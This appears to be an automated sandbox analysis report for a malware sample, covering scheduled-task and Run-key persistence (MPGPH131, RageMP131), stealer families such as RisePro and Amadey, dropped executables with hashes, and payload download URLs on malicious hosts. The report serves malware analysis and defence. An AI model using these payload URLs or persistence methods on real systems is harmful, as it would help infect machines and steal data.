Excluded domains from analysis (whitelisted): ocsp.digicert.com, login.live.com, slscr.update.microsoft.com, blobcollector.events.data.trafficmanager.net, onedsblobprdwus17.westus.cloudapp.azure.com, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, fe3cr.delivery.mp.microsoft.com
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Report size getting too big, too many NtOpenFile calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

Time	Type	Description
04:53:16	Task Scheduler	Run new task: MPGPH131 HR path: C:\ProgramData\MPGPH131\MPGPH131.exe
04:53:16	Task Scheduler	Run new task: MPGPH131 LG path: C:\ProgramData\MPGPH131\MPGPH131.exe
04:53:18	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run RageMP131 C:\Users\user\AppData\Local\RageMP131\RageMP131.exe
04:53:26	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run RageMP131 C:\Users\user\AppData\Local\RageMP131\RageMP131.exe
22:53:22	API Interceptor	1x Sleep call for process: WerFault.exe modified
22:53:40	API Interceptor	5665446x Sleep call for process: Lisect_AVT_24003_G1A_37.exe modified
22:53:47	API Interceptor	5507x Sleep call for process: MPGPH131.exe modified
22:53:59	API Interceptor	4291522x Sleep call for process: RageMP131.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
44.221.84.105	Lisect_AVT_24003_G1A_72.exe	Get hash	malicious	LummaC, Bdaejec, LummaC Stealer	Browse	ddos.dnsnb8.net:799/cj//k2.rar
	Lisect_AVT_24003_G1A_5.exe	Get hash	malicious	Quasar, Bdaejec	Browse	ddos.dnsnb8.net:799/cj//k1.rar
	Lisect_AVT_24003_G1A_16.exe	Get hash	malicious	Bdaejec	Browse	ddos.dnsnb8.net:799/cj//k2.rar
	LisectAVT_2403002C_193.exe	Get hash	malicious	Bdaejec, Metasploit	Browse	ddos.dnsnb8.net:799/cj//k3.rar
	LisectAVT_2403002C_196.exe	Get hash	malicious	Bdaejec	Browse	ddos.dnsnb8.net:799/cj//k1.rar
	LisectAVT_2403002B_91.exe	Get hash	malicious	Bdaejec, DBatLoader	Browse	ddos.dnsnb8.net:799/cj//k2.rar
	LisectAVT_2403002B_492.exe	Get hash	malicious	Bdaejec, Lokibot	Browse	ddos.dnsnb8.net:799/cj//k5.rar
	LisectAVT_2403002B_97.exe	Get hash	malicious	Bdaejec	Browse	ddos.dnsnb8.net:799/cj//k2.rar
	LisectAVT_2403002B_28.exe	Get hash	malicious	Bdaejec	Browse	ddos.dnsnb8.net:799/cj//k1.rar
	LisectAVT_2403002B_351.exe	Get hash	malicious	Amadey, Bdaejec	Browse	ddos.dnsnb8.net:799/cj//k5.rar
193.233.132.62	SecuriteInfo.com.Win32.PWSX-gen.14899.4987.exe	Get hash	malicious	Amadey, RisePro Stealer	Browse	193.233.132.62:57893/hera/amadka.exe
	SecuriteInfo.com.Win32.PWSX-gen.580.27252.exe	Get hash	malicious	Amadey, RisePro Stealer	Browse	193.233.132.62:57893/hera/amadka.exe
	SecuriteInfo.com.Win32.PWSX-gen.15960.19323.exe	Get hash	malicious	Amadey, RisePro Stealer	Browse	193.233.132.62:57893/hera/amadka.exe
	9iz0QM9rMM.exe	Get hash	malicious	Amadey, RisePro Stealer	Browse	193.233.132.62:57893/hera/amadka.exe
	4fMLTRkOfB.exe	Get hash	malicious	Amadey, RisePro Stealer	Browse	193.233.132.62:57893/hera/amadka.exe
	q7a5JOlhLZ.exe	Get hash	malicious	Amadey, RisePro Stealer	Browse	193.233.132.62:57893/hera/amadka.exe
	7jv1U7CgKF.exe	Get hash	malicious	Amadey, RisePro Stealer	Browse	193.233.132.62:57893/hera/amadka.exe
	file.exe	Get hash	malicious	Amadey, RisePro Stealer	Browse	193.233.132.62:57893/hera/amadka.exe
	SecuriteInfo.com.Win32.PWSX-gen.10022.32492.exe	Get hash	malicious	Amadey, RisePro Stealer	Browse	193.233.132.62:57893/hera/amadka.exe
	file.exe	Get hash	malicious	Amadey, RisePro Stealer	Browse	193.233.132.62:57893/hera/amadka.exe

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
ddos.dnsnb8.net	Lisect_AVT_24003_G1A_72.exe	Get hash	malicious	LummaC, Bdaejec, LummaC Stealer	Browse	44.221.84.105
	Lisect_AVT_24003_G1A_5.exe	Get hash	malicious	Quasar, Bdaejec	Browse	44.221.84.105
	Lisect_AVT_24003_G1A_16.exe	Get hash	malicious	Bdaejec	Browse	44.221.84.105
	LisectAVT_2403002C_193.exe	Get hash	malicious	Bdaejec, Metasploit	Browse	44.221.84.105
	LisectAVT_2403002C_196.exe	Get hash	malicious	Bdaejec	Browse	44.221.84.105
	LisectAVT_2403002B_91.exe	Get hash	malicious	Bdaejec, DBatLoader	Browse	44.221.84.105
	LisectAVT_2403002B_492.exe	Get hash	malicious	Bdaejec, Lokibot	Browse	44.221.84.105
	LisectAVT_2403002B_97.exe	Get hash	malicious	Bdaejec	Browse	44.221.84.105
	LisectAVT_2403002B_28.exe	Get hash	malicious	Bdaejec	Browse	44.221.84.105
	LisectAVT_2403002B_351.exe	Get hash	malicious	Amadey, Bdaejec	Browse	44.221.84.105

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
AMAZON-AESUS	Lisect_AVT_24003_G1A_72.exe	Get hash	malicious	LummaC, Bdaejec, LummaC Stealer	Browse	44.221.84.105
	Lisect_AVT_24003_G1A_5.exe	Get hash	malicious	Quasar, Bdaejec	Browse	44.221.84.105
	Lisect_AVT_24003_G1A_16.exe	Get hash	malicious	Bdaejec	Browse	44.221.84.105
	LisectAVT_2403002C_193.exe	Get hash	malicious	Bdaejec, Metasploit	Browse	44.221.84.105
	LisectAVT_2403002C_196.exe	Get hash	malicious	Bdaejec	Browse	44.221.84.105
	LisectAVT_2403002B_91.exe	Get hash	malicious	Bdaejec, DBatLoader	Browse	44.221.84.105
	LisectAVT_2403002B_492.exe	Get hash	malicious	Bdaejec, Lokibot	Browse	44.221.84.105
	LisectAVT_2403002B_97.exe	Get hash	malicious	Bdaejec	Browse	44.221.84.105
	LisectAVT_2403002B_28.exe	Get hash	malicious	Bdaejec	Browse	44.221.84.105
	LisectAVT_2403002B_351.exe	Get hash	malicious	Amadey, Bdaejec	Browse	44.221.84.105
FREE-NET-ASFREEnetEU	LisectAVT_2403002A_262.exe	Get hash	malicious	RisePro Stealer	Browse	193.233.132.190
	LisectAVT_2403002A_224.exe	Get hash	malicious	RisePro Stealer	Browse	193.233.132.74
	hunta[1].exe	Get hash	malicious	Bdaejec, RisePro Stealer	Browse	193.233.132.62
	External Own 4.20.exe	Get hash	malicious	PureLog Stealer, RedLine, zgRAT	Browse	147.45.47.64
	Aquantia_Setup 2.11.exe	Get hash	malicious	PureLog Stealer, RedLine, zgRAT	Browse	147.45.47.64
	AdobeUpdaterV131.exe	Get hash	malicious	Bdaejec, RisePro Stealer	Browse	193.233.132.62
	installer.exe	Get hash	malicious	LummaC, PureLog Stealer, Xmrig, zgRAT	Browse	147.45.47.81
	92.249.48.47-skid.arm7-2024-07-20T09_04_19.elf	Get hash	malicious	Mirai, Moobot	Browse	147.45.93.156
	conhost.exe	Get hash	malicious	Xmrig	Browse	147.45.47.81
	http://premium.davidabostic.com	Get hash	malicious	Unknown	Browse	147.45.78.74

JA3 Fingerprints

⊘No context

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
C:\Users\user\AppData\Local\Temp\MlpxPf.exe	Lisect_AVT_24003_G1A_70.exe	Get hash	malicious	LummaC, Bdaejec, LummaC Stealer	Browse
	Lisect_AVT_24003_G1A_72.exe	Get hash	malicious	LummaC, Bdaejec, LummaC Stealer	Browse
	Lisect_AVT_24003_G1A_5.exe	Get hash	malicious	Quasar, Bdaejec	Browse
	Lisect_AVT_24003_G1A_16.exe	Get hash	malicious	Bdaejec	Browse
	LisectAVT_2403002C_193.exe	Get hash	malicious	Bdaejec, Metasploit	Browse
	LisectAVT_2403002C_196.exe	Get hash	malicious	Bdaejec	Browse
	LisectAVT_2403002B_91.exe	Get hash	malicious	Bdaejec, DBatLoader	Browse
	LisectAVT_2403002B_492.exe	Get hash	malicious	Bdaejec, Lokibot	Browse
	LisectAVT_2403002B_97.exe	Get hash	malicious	Bdaejec	Browse
	LisectAVT_2403002B_28.exe	Get hash	malicious	Bdaejec	Browse

Created / dropped Files

C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\MlpxPf.exe
File Type:	MS-DOS executable PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	19456
Entropy (8bit):	6.591092709826399
Encrypted:	false
SSDEEP:	384:1FMS/XZQaD7U8iu4YsAa7ZA0UvH2lsRv21yW7GbAxur6+Y9PffPz:9BQGPL4vzZq2o9W7GsxBbPr
MD5:	5771F9EC7FA262D80BC5D5C704620207
SHA1:	3FCBA85C07F4CFB3A9169BF6E60FAEB34735B9E5
SHA-256:	D5EF5A34293E43CB71C913E24F0D226F08CCBDB201F831B380D9EA4776A93C0F
SHA-512:	57D2E92F6ACED0B3ABBBF790AEBEFDB58C685C6F65E9332232F9B62B47BAEA3C7982AD187910710B49837F2CBF093992632EB5F1E81844B1732D7AF007EC7BE7
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Reputation:	low
Preview:	MZ..........................................................@...PE..L....................................0............................................................................................... ..l...........................................................................................................PELIB...............................`....rsrc........ ......................@..@..Y\|.uR..P...0...B.................. ...................................................................................j.h"...h....j...(....Hello World!.MyProg........................................................................................................................................................................................................................(...........0...(.......................;.......User32.dll...MessageBoxA................................................................................................dummy.exe.....................TestExport.CallPlz................

C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\MlpxPf.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	2389504
Entropy (8bit):	6.731346420298797
Encrypted:	false
SSDEEP:	49152:BGSXoV72tpV9XE8Wwi1aCvYMdRluS/fYw44RxL:V4OEtwiICvYMpf
MD5:	8B92ADCAEFC215F8A389597B1F82E80D
SHA1:	EB2F7DBA5CC40784A05C11A7DE1DE0C334F2E565
SHA-256:	BF834E041AD3680B3DD58B8EBDA9DDB2573292203446969524D677C00EEAC6B2
SHA-512:	9EFB135556EFF049B5E6D9646A1F45CF99816371201A9F5F52711F4A730CB4674DC05B323AD1A826550B9828FEB10E3D32D3F43645703A4C27E292B2AF365574
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........Ark.Ark.Ark...o.Mrk...h.Jrk...n.^rk...j.Erk.H...Brk.H...nrk.Arj..pk...b.rk...k.@rk.....@rk...i.@rk.RichArk.........................PE..L.....(c.....................~.......p$...........@...........................$...........@.........................p...<............@ ......................P#.....@...p...................P...........@............................................text...e........................... ..`.rdata...^.......`..................@..@.data...`....0......................@....rsrc........@ ....... .............@..@.reloc.......P#......"#.............@..B.....u...P...p$..B...4$............. ...........................................................................................................................................................................................................................................................

C:\Program Files\7-Zip\Uninstall.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\MlpxPf.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	31744
Entropy (8bit):	6.36657394162034
Encrypted:	false
SSDEEP:	768:uWQ3655Kv1X/qY1MSdFBQGPL4vzZq2o9W7GsxBbPr:uHqaNrFdFmGCq2iW7z
MD5:	D4B4C09D60C82C129E44889E8E12470E
SHA1:	647951367CE890E9E8C976CB912908433BE04861
SHA-256:	0A840889C218D39B70FAEEC8CF7537968D5AC68F51DD5ABCC77DA7EEE76390FF
SHA-512:	194C565D6F74A0130F2C7C9B2464FE853998D8C11DD18F1020E1C59693C00E269D38C58610D7B438AF0D4F8B2FA256E943D11466DC0F89BD9C495304100A0DD3
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......S.6...X...X...X.x.R...X..V...X.x.\...X......X...Y.W.X......X.!.R...X...^...X.Rich..X.................PE..L...pN.d........../......V...@.......p.......0....@.........................................................................$9.......`...............................................................................0...............................text............................... ..`.rdata.......0......................@..@.data...X....@.......(..............@....rsrc........`.......*..............@..@.EpN.uZ..P...p...B...:.............. ...................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\MPGPH131\MPGPH131.exe

Download File

Process:	C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	2447360
Entropy (8bit):	7.930391577466747
Encrypted:	false
SSDEEP:	49152:e8GpcxEHvbuWvpD3pQcVTVx5QBUu/ApBsUIjtpULzhhLAJFhr:eRy0pBFrnu/ApBsUIRaLzv6
MD5:	6A672BBDC7865A7518441284D853F8D8
SHA1:	BE887B22A197194E90F9A090174F258BDB062562
SHA-256:	A3F809A16001F7EDEA3B2C946286C80DB82531A8CD037320FBA6CF8BBCF68284
SHA-512:	0E4F83CC50CF975D8CCEE5D61B009E877B9FBC680B64E04A540A92C9601462ADE0182376053FE15D0B8EF1AF89DD46C06B25BAAFD0A597832600C03900AFE5EE
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 95%
Preview:	MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.......C.........L.....L.....L.....H.G...H.....H.....H...R.L.....L.....L...............E.....-........Rich..................PE..L....~.e...............".....,.......p]...........@...........................]...........@.................................T...h....p.............................................................................................................. . .`..........................@....rsrc........p... ..................@....idata ............. ..............@... ..,.........."..............@...xhwtmwwr.....`A......$..............@...tmaftcgf.....0].......$.............@....taggant.0...@].."....$.............@....%.~.u...P...p]..B....%............. ...................................................................................................................................................

C:\ProgramData\MPGPH131\MPGPH131.exe:Zone.Identifier

Download File

Process:	C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	26
Entropy (8bit):	3.95006375643621
Encrypted:	false
SSDEEP:	3:ggPYV:rPYV
MD5:	187F488E27DB4AF347237FE461A079AD
SHA1:	6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256:	255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512:	89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious:	true
Preview:	[ZoneTransfer]....ZoneId=0

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_MlpxPf.exe_44251beb80dd5e7d95c3aacd014eb4bd9dd3755_509ea325_9e635127-f99b-40a5-a75b-dba6d17ffe59\Report.wer

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	0.9876943958931901
Encrypted:	false
SSDEEP:	96:nVFESn0Yb7Zsihn47afzQXIDcQZc6ocEUecw3U/+HbHg/5ksS/YyNl1zWDUMsxzL:V1b7Zy03s/hj8/B9zuiFqZ24IO8E
MD5:	E883ACEF662DDDB3C14CAD7E473D1B19
SHA1:	1B2DEDED4368E29A7EFA77683AC2BF225C4A0272
SHA-256:	552D4327052263F6D51AB7C4A3B7FBAC81D82E16CC460643B2C9EA12DC895C02
SHA-512:	A4D66775827E51983EB3715BD21962D5CB67D1EE6058D305056DA1F249889CF96A8A41976798E41C262453791C28BD0D52C66DC8B793B04811A20A0D74690D56
Malicious:	false
Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.6.6.3.4.9.5.9.6.8.6.0.4.7.6.2.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.6.6.3.4.9.5.9.7.4.5.4.2.2.7.9.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.9.e.6.3.5.1.2.7.-.f.9.9.b.-.4.0.a.5.-.a.7.5.b.-.d.b.a.6.d.1.7.f.f.e.5.9.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.3.a.c.d.c.2.a.7.-.1.1.6.8.-.4.1.4.f.-.8.d.4.4.-.d.4.d.0.8.3.3.1.8.2.4.e.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.M.l.p.x.P.f...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.7.3.0.-.0.0.0.1.-.0.0.1.4.-.d.7.8.1.-.9.1.c.8.3.d.d.e.d.a.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.0.7.6.6.6.f.7.e.2.4.c.5.7.2.2.3.9.2.7.a.a.9.6.e.d.5.5.a.3.6.5.8.0.0.0.0.f.f.f.f.!.0.0.0.0.d.4.e.9.e.f.1.0.d.7.6.8.5.d.4.9.1.5.8.3.c.6.f.a.9.3.a.e.5.d.9.1.0.5.d.8.1.5.b.d.!.M.l.p.x.P.f...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.1.3.

C:\ProgramData\Microsoft\Windows\WER\Temp\WER432A.tmp.dmp

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Mini DuMP crash report, 15 streams, Thu Jul 25 02:53:17 2024, 0x1205a4 type
Category:	dropped
Size (bytes):	152298
Entropy (8bit):	1.9360486627481648
Encrypted:	false
SSDEEP:	768:0RxrgB99WoY9nKpELjr7S66Q/KeY3v5EkasiQC145NXM:4xomJLjvF/KeY3v5EkasiQC145NXM
MD5:	42EC808E1D1AC2785A83F5DC96C09286
SHA1:	4B82315F41CAAE24D52CC2CF104FAA3F5F7EAA81
SHA-256:	E1689D7C695B75F44A3703E9A4AFF4D49BF30F6627C76A028A0CBD20DF5237EF
SHA-512:	32D819238D69F083A7D5D5A93ABFE74B58E86645E7D369D57B26ACFBE57A518C5907A15A69CEB7C389727E753BEC14CFCBA436725CC3299A4F3F9461C6F134F8
Malicious:	false
Preview:	MDMP..a..... ..........f............D...............X.......<.... ......T....N..........`.......8...........T............=..............8!..........$#..............................................................................eJ.......#......GenuineIntel............T.......0......f.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.......................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\Temp\WER4493.tmp.WERInternalMetadata.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	8302
Entropy (8bit):	3.7013894591118897
Encrypted:	false
SSDEEP:	192:R6l7wVeJj466d6YnB6UgmfWV0pDT89bcmsfqUm:R6lXJ8646YB6UgmfWfcFf4
MD5:	E07ABF1414B9A2758F8429D471A31CB4
SHA1:	E075BF48ADB5F3ACCB93A452440AD5A6D8C37659
SHA-256:	B1B6D338713DE9AF5096DA78C07FA7FBE0E6A6D21E6CFA7AA7D9E7746E039F87
SHA-512:	6D88CC87978F193A1658ABD63E759AC090FDD5B48BFC3A5C9042C5B9B3C0A276F428F1C9A4F5ACFF05E9907395989C1117EC946C4D80910F5CF83244B8CEEB42
Malicious:	false
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.1.8.4.0.<./.P.i.

C:\ProgramData\Microsoft\Windows\WER\Temp\WER44C3.tmp.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4551
Entropy (8bit):	4.44569090369217
Encrypted:	false
SSDEEP:	48:cvIwWl8zsNJg77aI9EtVWpW8VYwYm8M4Js8FYP+q8+jZSgtSXd:uIjfnI7itk7V8JmfZSgtSXd
MD5:	C9A8BCD210E32FE4D9DDFD236EC72615
SHA1:	61F2C9DCB6D5136665ECE6B6CDB5FDA48CC64053
SHA-256:	B28C234709E39DEA54182313B8DE65ADC8F27F17C00FC0F7CC6A301F4C54BA22
SHA-512:	3F9504A27FA694C1BA3076B2C0DE7D7430DEEBF01580C5F0A0A96903026717F47114E5ECD04152695206CA37908CD6D68586B8320D8B038052B80F2776CE1021
Malicious:	false
Preview:	<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="425875" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\k1[1].rar

Download File

Process:	C:\Users\user\AppData\Local\Temp\MlpxPf.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	4
Entropy (8bit):	1.5
Encrypted:	false
SSDEEP:	3:Nv:9
MD5:	D3B07384D113EDEC49EAA6238AD5FF00
SHA1:	F1D2D2F924E986AC86FDF7B36C94BCDF32BEEC15
SHA-256:	B5BB9D8014A0F9B1D61E21E796D78DCCDF1352F23CD32812F4850B878AE4944C
SHA-512:	0CF9180A764ABA863A67B6D72F0918BC131C6772642CB2DCE5A34F0A702F9470DDC2BF125C12198B1995C233C34B4AFD346C54A2334C350A948A51B6E8B4E6B6
Malicious:	false
Preview:	foo.

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\k1[2].rar

Download File

Process:	C:\Users\user\AppData\Local\Temp\MlpxPf.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	4
Entropy (8bit):	1.5
Encrypted:	false
SSDEEP:	3:Nv:9
MD5:	D3B07384D113EDEC49EAA6238AD5FF00
SHA1:	F1D2D2F924E986AC86FDF7B36C94BCDF32BEEC15
SHA-256:	B5BB9D8014A0F9B1D61E21E796D78DCCDF1352F23CD32812F4850B878AE4944C
SHA-512:	0CF9180A764ABA863A67B6D72F0918BC131C6772642CB2DCE5A34F0A702F9470DDC2BF125C12198B1995C233C34B4AFD346C54A2334C350A948A51B6E8B4E6B6
Malicious:	false
Preview:	foo.

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\k2[1].rar

Download File

Process:	C:\Users\user\AppData\Local\Temp\MlpxPf.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	4
Entropy (8bit):	1.5
Encrypted:	false
SSDEEP:	3:Nv:9
MD5:	D3B07384D113EDEC49EAA6238AD5FF00
SHA1:	F1D2D2F924E986AC86FDF7B36C94BCDF32BEEC15
SHA-256:	B5BB9D8014A0F9B1D61E21E796D78DCCDF1352F23CD32812F4850B878AE4944C
SHA-512:	0CF9180A764ABA863A67B6D72F0918BC131C6772642CB2DCE5A34F0A702F9470DDC2BF125C12198B1995C233C34B4AFD346C54A2334C350A948A51B6E8B4E6B6
Malicious:	false
Preview:	foo.

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\k2[2].rar

Download File

Process:	C:\Users\user\AppData\Local\Temp\MlpxPf.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	4
Entropy (8bit):	1.5
Encrypted:	false
SSDEEP:	3:Nv:9
MD5:	D3B07384D113EDEC49EAA6238AD5FF00
SHA1:	F1D2D2F924E986AC86FDF7B36C94BCDF32BEEC15
SHA-256:	B5BB9D8014A0F9B1D61E21E796D78DCCDF1352F23CD32812F4850B878AE4944C
SHA-512:	0CF9180A764ABA863A67B6D72F0918BC131C6772642CB2DCE5A34F0A702F9470DDC2BF125C12198B1995C233C34B4AFD346C54A2334C350A948A51B6E8B4E6B6
Malicious:	false
Preview:	foo.

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\k3[1].rar

Download File

Process:	C:\Users\user\AppData\Local\Temp\MlpxPf.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	4
Entropy (8bit):	1.5
Encrypted:	false
SSDEEP:	3:Nv:9
MD5:	D3B07384D113EDEC49EAA6238AD5FF00
SHA1:	F1D2D2F924E986AC86FDF7B36C94BCDF32BEEC15
SHA-256:	B5BB9D8014A0F9B1D61E21E796D78DCCDF1352F23CD32812F4850B878AE4944C
SHA-512:	0CF9180A764ABA863A67B6D72F0918BC131C6772642CB2DCE5A34F0A702F9470DDC2BF125C12198B1995C233C34B4AFD346C54A2334C350A948A51B6E8B4E6B6
Malicious:	false
Preview:	foo.

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\k4[1].rar

Download File

Process:	C:\Users\user\AppData\Local\Temp\MlpxPf.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	4
Entropy (8bit):	1.5
Encrypted:	false
SSDEEP:	3:Nv:9
MD5:	D3B07384D113EDEC49EAA6238AD5FF00
SHA1:	F1D2D2F924E986AC86FDF7B36C94BCDF32BEEC15
SHA-256:	B5BB9D8014A0F9B1D61E21E796D78DCCDF1352F23CD32812F4850B878AE4944C
SHA-512:	0CF9180A764ABA863A67B6D72F0918BC131C6772642CB2DCE5A34F0A702F9470DDC2BF125C12198B1995C233C34B4AFD346C54A2334C350A948A51B6E8B4E6B6
Malicious:	false
Preview:	foo.

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\k5[1].rar

Download File

Process:	C:\Users\user\AppData\Local\Temp\MlpxPf.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	4
Entropy (8bit):	1.5
Encrypted:	false
SSDEEP:	3:Nv:9
MD5:	D3B07384D113EDEC49EAA6238AD5FF00
SHA1:	F1D2D2F924E986AC86FDF7B36C94BCDF32BEEC15
SHA-256:	B5BB9D8014A0F9B1D61E21E796D78DCCDF1352F23CD32812F4850B878AE4944C
SHA-512:	0CF9180A764ABA863A67B6D72F0918BC131C6772642CB2DCE5A34F0A702F9470DDC2BF125C12198B1995C233C34B4AFD346C54A2334C350A948A51B6E8B4E6B6
Malicious:	false
Preview:	foo.

C:\Users\user\AppData\Local\RageMP131\RageMP131.exe

Download File

Process:	C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	2447360
Entropy (8bit):	7.930391577466747
Encrypted:	false
